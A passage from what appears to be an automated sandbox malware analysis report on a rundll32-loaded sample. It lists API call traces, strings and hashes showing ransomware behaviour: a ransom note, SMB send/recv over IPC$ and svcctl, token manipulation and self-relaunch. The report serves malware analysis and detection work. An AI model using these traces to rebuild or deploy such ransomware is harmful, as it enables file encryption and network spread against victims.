                                                • Part of subcall function 04BF4F43: HeapFree.KERNEL32(00000000,?,04BF51F9,?,?,?), ref: 04BF500E
                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04BF5205
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF5208
                                              • rand.MSVCRT ref: 04BF521B
                                              • rand.MSVCRT ref: 04BF5226
                                              • rand.MSVCRT ref: 04BF522F
                                              • sprintf.MSVCRT ref: 04BF5246
                                              • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5252
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5255
                                              • sprintf.MSVCRT ref: 04BF52AB
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04BF5308
                                              • HeapFree.KERNEL32(00000000), ref: 04BF530B
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5316
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04BF943A), ref: 04BF5319
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04BF5324
                                              • HeapFree.KERNEL32(00000000), ref: 04BF5327
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                              • String ID: IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                              • API String ID: 1576125627-3210642070
                                              • Opcode ID: 6485f7062ec0746e83bdd7587b833eabfcf0c51be4991f2901cd2a0047017428
                                              • Instruction ID: ea92822d5d338bc73096b205d093177598be92893af1b57d60a18dc40efc08d7
                                              • Opcode Fuzzy Hash: 6485f7062ec0746e83bdd7587b833eabfcf0c51be4991f2901cd2a0047017428
                                              • Instruction Fuzzy Hash: 5B518F7190020DBBDF119FA8DC44FEE7BAAEF49304F044095FA49A7192CB75E919CB60
                                              Function 04BF85FB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 04BF862D
                                                • Part of subcall function 04BF8147: memset.MSVCRT ref: 04BF8160
                                                • Part of subcall function 04BF8147: GetVersionExW.KERNEL32(?,?,?,771B0F10), ref: 04BF8179
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF8645
                                              • Process32FirstW.KERNEL32 ref: 04BF8666
                                              • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 04BF86A0
                                              • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 04BF86B9
                                              • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 04BF86DF
                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04BF8708
                                              • memset.MSVCRT ref: 04BF871E
                                              • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04BF8738
                                              • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04BF8767
                                              • CloseHandle.KERNEL32(?), ref: 04BF87A2
                                              • CloseHandle.KERNEL32(?), ref: 04BF87A8
                                              • Process32NextW.KERNEL32(?,?), ref: 04BF87BA
                                              • GetLastError.KERNEL32 ref: 04BF87CA
                                              • CloseHandle.KERNEL32(?), ref: 04BF87D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                              • String ID: @
                                              • API String ID: 4137997400-2766056989
                                              • Opcode ID: 33d82a01e3171496966b636c14b05010161e71422641a0b5cee41351ac68a8c1
                                              • Instruction ID: 6254f9eabb8b961172f09f939799e2873bfa5b7c6f4aa3dce49ca7a6a8a8988b
                                              • Opcode Fuzzy Hash: 33d82a01e3171496966b636c14b05010161e71422641a0b5cee41351ac68a8c1
                                              • Instruction Fuzzy Hash: 0A514C71608301AFD710AF25DC49E6FBBE8FB89754F040A6DF699D2190D730E909CBA2
                                              Function 04BF60F9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 113fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfW.USER32 ref: 04BF6118
                                              • PathCombineW.SHLWAPI(?,?,?), ref: 04BF6136
                                                • Part of subcall function 04BF6477: GetTickCount.KERNEL32 ref: 04BF6477
                                              • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04BF6170
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04BF6191
                                              • memset.MSVCRT ref: 04BF61C8
                                              • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 04BF61E2
                                              • StrCatW.SHLWAPI(?,?), ref: 04BF61EE
                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04BF621B
                                              • FlushFileBuffers.KERNEL32(00000000), ref: 04BF6226
                                              • LocalFree.KERNEL32(?), ref: 04BF622F
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04BF6236
                                              Strings
                                              • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 04BF61D6
                                              • Readme.txt, xrefs: 04BF6107
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                              • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
                                              • API String ID: 1343258794-115798760
                                              • Opcode ID: 75869dd76835a1787800f8b3cb8b5a9002c396a63e7c97e5ce45edee4935c7eb
                                              • Instruction ID: 7ec4d9774757c417071a59c4d41fd70947f8f42b2fa51690295250e15357e958
                                              • Opcode Fuzzy Hash: 75869dd76835a1787800f8b3cb8b5a9002c396a63e7c97e5ce45edee4935c7eb
                                              • Instruction Fuzzy Hash: 0B316376500108AFDB21DBA5DD49D9B7BFDEB49700B0485A6FA0AD3040DB35FA59CBB0
                                              Function 04BF3071 Relevance: 21.1, APIs: 14, Instructions: 95memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,771AF380,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04BF3089
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3092
                                              • GetProcessHeap.KERNEL32(00000008,0000003F,771ADF60,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF30A4
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF30A7
                                              • htons.WS2_32(0000003B), ref: 04BF30BF
                                              • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 04BF30F7
                                              • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 04BF310D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3127
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF312E
                                              • memcpy.MSVCRT ref: 04BF3144
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3153
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF315A
                                              • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF3165
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04BF316C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 317911368-0
                                              • Opcode ID: 701983b0dd25650b27fd01645dea28f20c9a57eee38b54576f5bb11b76c83cf6
                                              • Instruction ID: 37eb830ebed707788ca38f1790852ec2a5ed1e5ff4b8474fbbe38dd24fd35cdc
                                              • Opcode Fuzzy Hash: 701983b0dd25650b27fd01645dea28f20c9a57eee38b54576f5bb11b76c83cf6
                                              • Instruction Fuzzy Hash: 7C318D71600305BBEF105FE4DC49F6A7BADEF88300F14509AFA099B280DB759954DB64
                                              Function 04BF892A Relevance: 19.6, APIs: 13, Instructions: 91threadmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 04BF8944
                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04BF894B
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 04BF896D
                                              • GetLastError.KERNEL32 ref: 04BF897E
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 04BF898F
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 04BF89A8
                                              • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 04BF89BF
                                              • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 04BF89D2
                                              • GetLastError.KERNEL32 ref: 04BF89FD
                                              • GlobalFree.KERNEL32(00000000), ref: 04BF8A00
                                              • GetLastError.KERNEL32 ref: 04BF8A08
                                              • CloseHandle.KERNEL32(?), ref: 04BF8A0F
                                              • GetLastError.KERNEL32 ref: 04BF8A17
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                              • String ID:
                                              • API String ID: 1283781744-0
                                              • Opcode ID: 03413a6dc418f7d2b86699f7fa76706f54538ca89e0ccd0fe133fd1662585c53
                                              • Instruction ID: 8bfa1d92d7629f923559dbc048a2befbf3ea31b0574332f1a9e1419b0bce7a6a
                                              • Opcode Fuzzy Hash: 03413a6dc418f7d2b86699f7fa76706f54538ca89e0ccd0fe133fd1662585c53
                                              • Instruction Fuzzy Hash: 9E317131900215FFEF10AFA4DC88B9DBF78EF44740F1081A6EA0AE2150D779AE59DB65
                                              Function 04BF2F5A Relevance: 18.1, APIs: 12, Instructions: 98memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04BF2F73
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2F7C
                                              • GetProcessHeap.KERNEL32(00000008,?,7675C650), ref: 04BF2F97
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2F9A
                                              • htons.WS2_32(424D53FE), ref: 04BF2FBA
                                              • memcpy.MSVCRT ref: 04BF300B
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF301B
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF3032
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF3048
                                              • HeapFree.KERNEL32(00000000), ref: 04BF304F
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF305A
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3061
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 2433318192-0
                                              • Opcode ID: e96d3fd1656ab1897359d6c59370e64529393bb11fb564c5975b653b68c6f94d
                                              • Instruction ID: 8760f1c3ad74886e24e3f6eb2898972abd7b6e9b7b10f135dba1c3262c882d8d
                                              • Opcode Fuzzy Hash: e96d3fd1656ab1897359d6c59370e64529393bb11fb564c5975b653b68c6f94d
                                              • Instruction Fuzzy Hash: F7319C75900245ABEF509FA5DC88B9A7BBCFF48700F05509AFE09EB241D779D904CB64
                                              Function 04BF32AF Relevance: 18.1, APIs: 12, Instructions: 88memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 04BF32CB
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF32D4
                                              • GetProcessHeap.KERNEL32(00000008,?,771AF380), ref: 04BF32EF
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF32F2
                                              • htons.WS2_32(?), ref: 04BF330F
                                              • memcpy.MSVCRT ref: 04BF333D
                                              • send.WS2_32(?,00000000,?,00000000), ref: 04BF3350
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF3368
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF337B
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3382
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF338D
                                              • HeapFree.KERNEL32(00000000), ref: 04BF3394
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                              • String ID:
                                              • API String ID: 2433318192-0
                                              • Opcode ID: d79d6b8f2e783946b1baddfa5c058883f9180af916887f527335405c392090bb
                                              • Instruction ID: 1ed2abc3e1df70423080b129dd910f3d85dc962652c81dd87f8ca58f85d5dd34
                                              • Opcode Fuzzy Hash: d79d6b8f2e783946b1baddfa5c058883f9180af916887f527335405c392090bb
                                              • Instruction Fuzzy Hash: 89312D7190020ABBEF009FA5DC45AAE7BBCEF49710F148056FA09EB291DB78DD05DB60
                                              Function 04BF41E9 Relevance: 16.7, APIs: 13, Instructions: 443memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,771AF380), ref: 04BF41FD
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF4204
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40F8
                                                • Part of subcall function 04BF40E3: HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF40FB
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF4148
                                                • Part of subcall function 04BF40E3: HeapAlloc.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF414B
                                                • Part of subcall function 04BF40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF4184
                                                • Part of subcall function 04BF40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04BF423E,?,?,?,04BF423D,?,?,?,?,00000000), ref: 04BF41BC
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04BF423D,?,?,?,?), ref: 04BF41CB
                                                • Part of subcall function 04BF40E3: HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41CE
                                                • Part of subcall function 04BF40E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41D7
                                                • Part of subcall function 04BF40E3: HeapFree.KERNEL32(00000000,?,?,?,04BF423D,?,?,?,?,00000000,00000002), ref: 04BF41DA
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04BF4287
                                              • HeapFree.KERNEL32(00000000), ref: 04BF428E
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04BF42D9
                                              • HeapFree.KERNEL32(00000000), ref: 04BF42E0
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04BF4336
                                              • HeapFree.KERNEL32(00000000), ref: 04BF433D
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,771AF380,?,00000000,00000100,?), ref: 04BF4399
                                              • HeapFree.KERNEL32(00000000), ref: 04BF43A0
                                              • memset.MSVCRT ref: 04BF43AE
                                                • Part of subcall function 04BF3D0D: rand.MSVCRT ref: 04BF3EC3
                                                • Part of subcall function 04BF3D0D: memset.MSVCRT ref: 04BF3EFC
                                                • Part of subcall function 04BF3D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04BF3F38
                                                • Part of subcall function 04BF3D0D: htons.WS2_32(?), ref: 04BF3F5C
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 04BF466C
                                              • HeapFree.KERNEL32(00000000), ref: 04BF4673
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,771AF380,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?), ref: 04BF3D2B
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D34
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04BF3D46
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D49
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3D63
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3D66
                                                • Part of subcall function 04BF3D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04BF4269,?,00000000,?,?,?), ref: 04BF3E5B
                                                • Part of subcall function 04BF3D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04BF3E65
                                                • Part of subcall function 04BF3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04BF4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04BF3E68
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                              • String ID:
                                              • API String ID: 2891003447-0
                                              • Opcode ID: d768231355ccef85832433f92ffe3c65af47436a77496ce2799e2fdeed20b965
                                              • Instruction ID: 6c6c811d0b7cbbf1199b85b5f3432c0a874d891d05be7782f2164a60936c6e50
                                              • Opcode Fuzzy Hash: d768231355ccef85832433f92ffe3c65af47436a77496ce2799e2fdeed20b965
                                              • Instruction Fuzzy Hash: C9F190B1904745AFDB11CF94CC40AABBBB7FF49304F088499EA49AB351C3B5E919CB90
                                              Function 04BF2E12 Relevance: 16.6, APIs: 11, Instructions: 109memorynetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04BF2E32
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2E3B
                                              • GetProcessHeap.KERNEL32(00000008,00000048,771AF380), ref: 04BF2E4D
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF2E50
                                              • htons.WS2_32(00000044), ref: 04BF2E68
                                              • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04BF2EF3
                                              • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04BF2F0B
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF2F31
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2F38
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF2F43
                                              • HeapFree.KERNEL32(00000000), ref: 04BF2F4A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                              • String ID:
                                              • API String ID: 1780562090-0
                                              • Opcode ID: 22fadb0649eba01d42966bf6bb1bf5624a6a157af7b0eda53be2b2b704ba70be
                                              • Instruction ID: 57581652c8f179ca43b5b9979486da06c2e9258c06d98e5c883004457d349942
                                              • Opcode Fuzzy Hash: 22fadb0649eba01d42966bf6bb1bf5624a6a157af7b0eda53be2b2b704ba70be
                                              • Instruction Fuzzy Hash: 1741B335540345AAEF109FA4DC49BAA7BB8FF48310F109499FA0D9B281D779D849CB68
                                              Function 04BF7BF7 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69processstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF7C0E
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04BF7C28
                                              • GetModuleFileNameW.KERNEL32(04C07BC8,0000030C), ref: 04BF7C43
                                              • PathFindFileNameW.SHLWAPI(04C07BC8,?), ref: 04BF7C51
                                              • wsprintfW.USER32 ref: 04BF7C6B
                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF7CB3
                                              • ExitProcess.KERNEL32 ref: 04BF7CBA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                              • API String ID: 3592876439-3730106045
                                              • Opcode ID: cce8c04ee3eda659e11b1f5650c25b1d33f4d6350fe9b6586eecf0ecf056cfd3
                                              • Instruction ID: d24f191e5c311a76aff4446bc8d448bd4038d4d5b0ef278b8ecd6b64a15632ab
                                              • Opcode Fuzzy Hash: cce8c04ee3eda659e11b1f5650c25b1d33f4d6350fe9b6586eecf0ecf056cfd3
                                              • Instruction Fuzzy Hash: B21142B25011196BEB119BA4CD48EEF77BDEB09301F0441A6F60AE3141EE35AE588B74
                                              Function 04BF69AE Relevance: 12.6, APIs: 10, Instructions: 97memoryCOMMON
                                              Download Yara Rule
                                              APIs
